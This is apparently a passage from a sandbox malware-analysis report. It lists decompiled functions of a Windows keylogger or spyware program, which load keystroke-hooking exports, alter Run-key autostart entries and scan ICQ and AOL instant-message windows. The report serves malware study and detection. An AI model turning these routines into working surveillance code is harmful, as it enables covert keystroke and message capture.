    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#860$H_prolog$#324#567Color
    • String ID:
    • API String ID: 4268370581-0
    • Opcode ID: b4f8629e4598d0e7ebb7e28fa231ee99bfb9faf3d400a4fe967322c0592e44b7
    • Instruction ID: b41c0ea52706e1c116a71570a7e5e4e629c207cf3181a50da6fbf2ac53039e64
    • Opcode Fuzzy Hash: b4f8629e4598d0e7ebb7e28fa231ee99bfb9faf3d400a4fe967322c0592e44b7
    • Instruction Fuzzy Hash: 05219230900784DADB15E7A6D441BDDFBB0AF65308F10885EA597632C2DBB82B08C765
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E00427EA5(void* __ecx) {
    				void* __esi;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				long _t23;
    				void* _t31;
    				void* _t48;
    
    				_t48 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(1);
    				_t19 = L00404F47(_t18, __ecx + 0x12c, __ecx);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(2);
    				_t20 = L00404F47(_t19, _t48 + 0xd8, _t48);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(0xe005);
    				_t21 = L00404F47(_t20, _t48 + 0x180, _t48);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t48);
    				_push(0x3e8);
    				L00404F47(_t21, _t48 + 0x1d4, _t48);
    				_t23 = GetSysColor(0xf);
    				_push("Verdana");
    				 *(_t48 + 0xb0) = _t23;
    				 *((intOrPtr*)(_t48 + 0xa8)) = 0x2bc;
    				 *((intOrPtr*)(_t48 + 0xa4)) = 0xe;
    				L0043DDD2();
    				_push( *((intOrPtr*)(_t48 + 0xd0)));
    				L0043E15C();
    				_push((0 |  *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) != 0x00000000) + 0x492);
    				_push(0x493);
    				_push(0x492);
    				L0043E072();
    				E004280C6( *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) & 0x000000ff, _t48,  *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) & 0x000000ff);
    				_push( *((intOrPtr*)(_t48 + 0xd4)) + 0x150);
    				_push(0x494);
    				L0043E066();
    				L0043E15C();
    				_t31 = 1;
    				return _t31;
    			}
    0x00427ea9
    0x00427eab
    0x00427eb5
    0x00427ebc
    0x00427ec2
    0x00427ec3
    0x00427ec4
    0x00427ec5
    0x00427ecd
    0x00427ed2
    0x00427ed4
    0x00427ed5
    0x00427ed6
    0x00427ed7
    0x00427ed8
    0x00427ee0
    0x00427ee5
    0x00427ee7
    0x00427ee8
    0x00427ee9
    0x00427eea
    0x00427eeb
    0x00427ef6
    0x00427efb
    0x00427efd
    0x00427efe
    0x00427eff
    0x00427f00
    0x00427f01
    0x00427f0c
    0x00427f13
    0x00427f19
    0x00427f24
    0x00427f2a
    0x00427f34
    0x00427f3e
    0x00427f43
    0x00427f4c
    0x00427f69
    0x00427f6a
    0x00427f6f
    0x00427f72
    0x00427f87
    0x00427f99
    0x00427f9a
    0x00427f9f
    0x00427fa6
    0x00427fad
    0x00427fb2

    APIs
    • #4710.MFC42 ref: 00427EAB
    • GetSysColor.USER32(0000000F), ref: 00427F13
    • #860.MFC42 ref: 00427F3E
    • #6199.MFC42(?), ref: 00427F4C
    • #1783.MFC42(00000492,00000493,00000000,?), ref: 00427F72
      • Part of subcall function 004280C6: #3092.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D2
      • Part of subcall function 004280C6: #2642.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D9
      • Part of subcall function 004280C6: #3092.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280E9
      • Part of subcall function 004280C6: #2642.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280F0
    • #3092.MFC42(00000494,?,?,00000492,00000493,00000000,?), ref: 00427F9F
    • #6199.MFC42(00000494,?,?,00000492,00000493,00000000,?), ref: 00427FA6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$#2642#6199$#1783#4710#860Color
    • String ID: Verdana
    • API String ID: 1486464219-987297809
    • Opcode ID: 2c9a6b9d475d403de3149958310782fb5da72e87d5f7b8baa2737736c69b166f
    • Instruction ID: 3070653a1b647c8fa2bbaf92acb5b6fa64600ae0ce74d28e4e55b190f3e01522
    • Opcode Fuzzy Hash: 2c9a6b9d475d403de3149958310782fb5da72e87d5f7b8baa2737736c69b166f
    • Instruction Fuzzy Hash: 4421B6703017047BE624A772CC96FEB7A9CDF85744F00042EB29AA62C2DEB52944C764
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00420C62(intOrPtr __ecx, void* __eflags) {
    				intOrPtr* _t32;
    				long _t33;
    				void* _t34;
    				void* _t35;
    				void* _t36;
    				void* _t38;
    				intOrPtr* _t55;
    				intOrPtr _t58;
    				void* _t60;
    
    				E0043E4E0(0x44207c, _t60);
    				_push(__ecx);
    				_push(__ecx);
    				_t58 = __ecx;
    				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
    				 *((intOrPtr*)(__ecx)) = 0x4493d8;
    				 *(_t60 - 4) = 8;
    				E00421274(__ecx, __eflags, 0);
    				E00428B4A();
    				_t32 =  *((intOrPtr*)(__ecx + 0x2758));
    				_t64 = _t32;
    				if(_t32 != 0) {
    					 *_t32(0);
    				}
    				_t33 = SendMessageA(0xffff, 0, 0, 0);
    				 *((intOrPtr*)(_t60 - 0x14)) = _t58 + 0x276c;
    				 *(_t60 - 4) = 9;
    				L0043DD36();
    				 *(_t60 - 4) = 7;
    				L0043DD36();
    				 *(_t60 - 4) = 6;
    				L0043DD36();
    				 *(_t60 - 4) = 5;
    				_t34 = E004284F0(_t33, _t58 + 0x1204);
    				 *(_t60 - 4) = 4;
    				_t35 = E004284F0(_t34, _t58 + 0xd50);
    				 *(_t60 - 4) = 3;
    				_t36 = E004284F0(_t35, _t58 + 0x89c);
    				 *(_t60 - 4) = 2;
    				E004284F0(_t36, _t58 + 0x3e8);
    				 *(_t60 - 4) = 1;
    				_t38 = E0042003A(_t58 + 0x78, _t64);
    				_t55 = _t58 + 0x6c;
    				 *((intOrPtr*)(_t60 - 0x14)) = _t55;
    				 *_t55 = 0x445440;
    				 *(_t60 - 4) = 0xa;
    				L0043DD72();
    				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
    				 *_t55 = 0x44547c;
    				L0043E04E();
    				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
    				return _t38;
    			}
    0x00420c67
    0x00420c6c
    0x00420c6d
    0x00420c6f
    0x00420c72
    0x00420c75
    0x00420c7d
    0x00420c85
    0x00420c8a
    0x00420c8f
    0x00420c95
    0x00420c97
    0x00420c9a
    0x00420c9a
    0x00420ca4
    0x00420cb0
    0x00420cb9
    0x00420cbd
    0x00420cc8
    0x00420ccc
    0x00420cd7
    0x00420cdb
    0x00420ce6
    0x00420cea
    0x00420cf5
    0x00420cf9
    0x00420d04
    0x00420d08
    0x00420d13
    0x00420d17
    0x00420d1f
    0x00420d23
    0x00420d28
    0x00420d2b
    0x00420d2e
    0x00420d36
    0x00420d3a
    0x00420d3f
    0x00420d45
    0x00420d4b
    0x00420d55
    0x00420d5d

    APIs
    • __EH_prolog.LIBCMT ref: 00420C67
      • Part of subcall function 00421274: __EH_prolog.LIBCMT ref: 00421279
      • Part of subcall function 00421274: LoadLibraryA.KERNEL32(?,00000000,?,00000000), ref: 004212B9
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(00000000,SetHook), ref: 004212D8
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableSpecialKeysLogging), ref: 004212F3
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(DLL_GetProjectVersion), ref: 0042130E
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(EnablePreHandle), ref: 00421329
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableNTInvisible), ref: 00421344
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableDiaryTracking), ref: 0042135F
      • Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableAltInterception), ref: 00421376
      • Part of subcall function 00421274: #1200.MFC42(?,00000010,00000000,?,00000000), ref: 004213A8
      • Part of subcall function 00421274: #800.MFC42(?,00000010,00000000,?,00000000), ref: 004213B4
      • Part of subcall function 00428B4A: FreeLibrary.KERNEL32(75370000,00420C8F,00000000,?,00000000,?,?,0041FEF1), ref: 00428B54
    • SendMessageA.USER32(0000FFFF,00000000,00000000,00000000), ref: 00420CA4
    • #800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CBD
    • #800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CCC
    • #800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CDB
    • #2414.MFC42(?,00000000,?,?,0041FEF1), ref: 00420D3A
    • #641.MFC42(?,00000000,?,?,0041FEF1), ref: 00420D4B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$#800$H_prologLibrary$#1200#2414#641FreeLoadMessageSend
    • String ID: | D
    • API String ID: 3770306581-1184885005
    • Opcode ID: be6548f9cddb7e409cbf84289a39a8f7b659c8c7b0a1bf8dc634c04f12132317
    • Instruction ID: 58e8910697103f814cb901bc3ee9ec1830d65644f69f7da7795e59f90f6fb002
    • Opcode Fuzzy Hash: be6548f9cddb7e409cbf84289a39a8f7b659c8c7b0a1bf8dc634c04f12132317
    • Instruction Fuzzy Hash: C121CC30901681DAD715EBA6D5057EEFBF4AFA6308F50464EA49963282DBB83B04C626
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428249() {
    				void* _v8;
    				char _v72;
    
    				E0042A6AA( &_v72, 0, 0);
    				 *(strrchr( &_v72, 0x2e)) = 0;
    				RegOpenKeyA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8);
    				RegDeleteValueA(_v8,  &_v72);
    				RegCloseKey(_v8);
    				RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8);
    				RegDeleteValueA(_v8,  &_v72);
    				return RegCloseKey(_v8);
    			}
    0x0042825a
    0x00428274
    0x00428284
    0x00428293
    0x0042829e
    0x004282ae
    0x004282b7
    0x004282c2

    APIs
      • Part of subcall function 0042A6AA: GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 0042A6C3
      • Part of subcall function 0042A6AA: lstrlenA.KERNEL32(?), ref: 0042A6D6
      • Part of subcall function 0042A6AA: lstrlenA.KERNEL32 ref: 0042A6E4
      • Part of subcall function 0042A6AA: lstrcatA.KERNEL32(00000000), ref: 0042A701
      • Part of subcall function 0042A6AA: strrchr.MSVCRT ref: 0042A710
      • Part of subcall function 0042A6AA: lstrcpyA.KERNEL32(?,00000001), ref: 0042A71D
    • strrchr.MSVCRT ref: 00428265
    • RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
    • RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
    • RegCloseKey.ADVAPI32(?), ref: 0042829E
    • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
    • RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
    • RegCloseKey.ADVAPI32(?), ref: 004282BC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CloseDeleteOpenValuelstrlenstrrchr$FileModuleNamelstrcatlstrcpy
    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • API String ID: 4064599168-3913687870
    • Opcode ID: 912e6d8e2a2d6d185f7b45b3ca63b2f121fa44e9e1f5146e2cffeb0bf956013f
    • Instruction ID: 7b2be888fc126ab24d092b6f081b655f08524486b36ed0db7a19b91b7c9bcbd2
    • Opcode Fuzzy Hash: 912e6d8e2a2d6d185f7b45b3ca63b2f121fa44e9e1f5146e2cffeb0bf956013f
    • Instruction Fuzzy Hash: B4014F7690014CFFDB01EBE4DD85E9E7B7CEB85308B200062EA00A2112D671AF19DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E004092E1(struct HWND__* _a4, char* _a8) {
    				struct HWND__* _t9;
    				signed int _t10;
    				CHAR* _t14;
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "Button", "ICQ") == 0) {
    						goto L1;
    					} else {
    						_t14 = "RichEdit20A";
    						_t9 = FindWindowExA(_a4, 0, _t14, 0);
    						if(_t9 == 0) {
    							goto L1;
    						}
    						_t10 = FindWindowExA(_a4, _t9, _t14, 0);
    						asm("sbb al, al");
    						return  ~_t10 + 1;
    					}
    				}
    				L1:
    				return 0;
    			}
    0x004092ec
    0x00409307
    0x00000000
    0x00409323
    0x00409323
    0x0040932e
    0x00409332
    0x00000000
    0x00000000
    0x0040933a
    0x0040933e
    0x00000000
    0x00409340
    0x00409307
    0x004092ee
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: #32770$Button$ICQ$RichEdit20A
    • API String ID: 3975895692-2832032975
    • Opcode ID: c6edd5a0281d798725ba843f79a0b680ba443edcacbd3a636c9b5c8a64934033
    • Instruction ID: 33208eb164e93638c8747c7c9d45e8ec07bacc87aef12c137d348bfd7427462e
    • Opcode Fuzzy Hash: c6edd5a0281d798725ba843f79a0b680ba443edcacbd3a636c9b5c8a64934033
    • Instruction Fuzzy Hash: 68F0F63164021D7BDB115E61DC81E677F1DDB427DAB11803BFC04A5196C2358D5596B8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409417(struct HWND__* _a4, char* _a8) {
    				struct HWND__* _t11;
    				CHAR* _t15;
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "Button", "ICQ") == 0) {
    						goto L1;
    					} else {
    						_t15 = "AfxOleControl42";
    						_t11 = FindWindowExA(_a4, 0, _t15, 0);
    						if(_t11 == 0) {
    							goto L1;
    						}
    						return FindWindowExA(_a4, _t11, _t15, 0) & 0xffffff00 | _t12 != 0x00000000;
    					}
    				}
    				L1:
    				return 0;
    			}
    0x00409422
    0x0040943d
    0x00000000
    0x00409459
    0x00409459
    0x00409464
    0x00409468
    0x00000000
    0x00000000
    0x00000000
    0x00409474
    0x0040943d
    0x00409424
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: #32770$AfxOleControl42$Button$ICQ
    • API String ID: 3975895692-3418877755
    • Opcode ID: 93524dc3c454a6c06e28bb8c388d0b640a9b8e77a7c9c7097eed8afc565a44eb
    • Instruction ID: 1dfaac3a0c45c9d43273807a4795fa31b4824e83bf51e2803ee334bb54ceb4bf
    • Opcode Fuzzy Hash: 93524dc3c454a6c06e28bb8c388d0b640a9b8e77a7c9c7097eed8afc565a44eb
    • Instruction Fuzzy Hash: 43F0F63160421C7BDF115E61DC41E6B7E5DEB427EAB10C033FC04A5163C235CD5696B8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0040F27A(long __ecx, void* __eflags) {
    				char _v24;
    				void* __edi;
    				void* __ebp;
    				int _t8;
    				struct HWND__* _t9;
    				void* _t15;
    				long _t16;
    				struct HWND__* _t17;
    
    				_t16 = __ecx;
    				E0040F4AE(__ecx);
    				_t17 = GetForegroundWindow();
    				GetClassNameA(_t17,  &_v24, 0x14);
    				_t8 = strcmp( &_v24, "AOL Frame25");
    				_push(0);
    				if(_t8 != 0) {
    					_push(_t17);
    					_t9 = E0040F2EA(_t16, _t15, _t16);
    				} else {
    					_t9 = FindWindowExA(_t17, 0, "MDIClient", ??);
    					if(_t9 != 0) {
    						_t9 = EnumChildWindows(_t9, E0040A558, _t16);
    					}
    				}
    				L0043E192();
    				return _t9;
    			}
    0x0040f282
    0x0040f284
    0x0040f28f
    0x0040f298
    0x0040f2a7
    0x0040f2b0
    0x0040f2b2
    0x0040f2d5
    0x0040f2d8
    0x0040f2b4
    0x0040f2bc
    0x0040f2c4
    0x0040f2cd
    0x0040f2cd
    0x0040f2c4
    0x0040f2df
    0x0040f2e7

    APIs
      • Part of subcall function 0040F4AE: __EH_prolog.LIBCMT ref: 0040F4B3
      • Part of subcall function 0040F4AE: IsWindow.USER32(?), ref: 0040F4E7
      • Part of subcall function 0040F4AE: #535.MFC42(?), ref: 0040F562
    • GetForegroundWindow.USER32 ref: 0040F289
    • GetClassNameA.USER32(00000000,?,00000014), ref: 0040F298
    • strcmp.MSVCRT ref: 0040F2A7
    • FindWindowExA.USER32 ref: 0040F2BC
    • EnumChildWindows.USER32 ref: 0040F2CD
    • #2379.MFC42(00000000,00000000), ref: 0040F2DF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#2379#535ChildClassEnumFindForegroundH_prologNameWindowsstrcmp
    • String ID: AOL Frame25$MDIClient
    • API String ID: 1572395021-662669148
    • Opcode ID: a243f2a0a7d2e1f3ddefa5d546183dc2f23e5a37e51c77b7f752b9b94ca9d3b2
    • Instruction ID: 5847035ba2ef253654096b39f12c3da6d0f446c485fda01d8a68aa349e3583cf
    • Opcode Fuzzy Hash: a243f2a0a7d2e1f3ddefa5d546183dc2f23e5a37e51c77b7f752b9b94ca9d3b2
    • Instruction Fuzzy Hash: A6F0C27920120476D62077765C0AF6F365C8B86715F60003BF501B18C2EA7C990991BD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040A4BB() {
    				signed int _t14;
    				void* _t17;
    				signed int _t19;
    				void* _t27;
    
    				E0043E4E0(0x43fa28, _t27);
    				_t19 = 0;
    				if( *((intOrPtr*)(_t27 + 8)) == 0 || strncmp( *(_t27 + 0xc), "AOL Child", 9) != 0) {
    					_t14 = 0;
    				} else {
    					_push( *((intOrPtr*)(_t27 + 8)));
    					_push(_t27 + 0xc);
    					_t17 = E0040FEA7();
    					_push("IM To:");
    					 *(_t27 - 4) = 0;
    					L0043DFD6();
    					if(_t17 != 0xffffffff) {
    						L5:
    						_t19 = 1;
    					} else {
    						_push(">IM From:");
    						L0043DFD6();
    						if(_t17 != 0xffffffff) {
    							goto L5;
    						}
    					}
    					 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
    					L0043DD36();
    					_t14 = _t19;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
    				return _t14;
    			}
    0x0040a4c0
    0x0040a4c6
    0x0040a4cb
    0x0040a4e4
    0x0040a4e8
    0x0040a4e8
    0x0040a4ee
    0x0040a4ef
    0x0040a4f6
    0x0040a4fe
    0x0040a501
    0x0040a509
    0x0040a51d
    0x0040a51d
    0x0040a50b
    0x0040a50b
    0x0040a513
    0x0040a51b
    0x00000000
    0x00000000
    0x0040a51b
    0x0040a51f
    0x0040a526
    0x0040a52b
    0x0040a52b
    0x0040a531
    0x0040a539

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
